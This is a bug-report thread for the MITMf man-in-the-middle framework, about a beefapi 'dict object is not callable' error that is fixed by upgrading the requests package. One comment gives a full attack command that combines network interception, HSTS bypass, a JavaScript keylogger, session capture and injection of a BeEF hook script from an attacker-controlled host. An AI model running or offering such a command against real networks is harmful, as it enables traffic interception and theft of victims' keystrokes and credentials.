### ISSUE TITLE
"beefapi ERROR: 'dict' object is not callable" is back when using --beefauto

### ISSUE THREAD

**Issue by cmevident** [byt3bl33d3r/MITMf#93]
beefapi ERROR: 'dict' object is not callable

was working about 4 days ago what i got from master throws this error again.
not sure why it was previously working correctly.

**Comment by byt3bl33d3r** [comment]
Hi,
I'll take a look asap, in the meantime can you give me the full command string you used and the OS? 
Thanks

**Comment by cmevident** [comment]
./mitmf.py -i eth0 --hsts -a --ferretng --jskeylogger --inject --js-url="http://$LHOST:3000/hook.js" --beefauto

it seems to still be necessary to pass the jook using js-url also

**Comment by OctAg0nO** [comment]
run "pip install requests --upgrade"

**Comment by byt3bl33d3r** [comment]
@cmevident sorry this is taking so long, been a little busy lately :/ 
Anyway I tried to reproduce the problem yesterday with no success, try running the command that @OctAg0nO mentioned since it is most likely a problem with old python packages...
If you can post the output of ```pip freeze``` that would be awesome

**Comment by cmevident** [comment]
good idea i'll give that a shot

**Comment by cmevident** [comment]
that did it ty @OctAg0nO

**Comment by byt3bl33d3r** [comment]
@cmevident glad to hear, thanks @OctAg0nO ;)
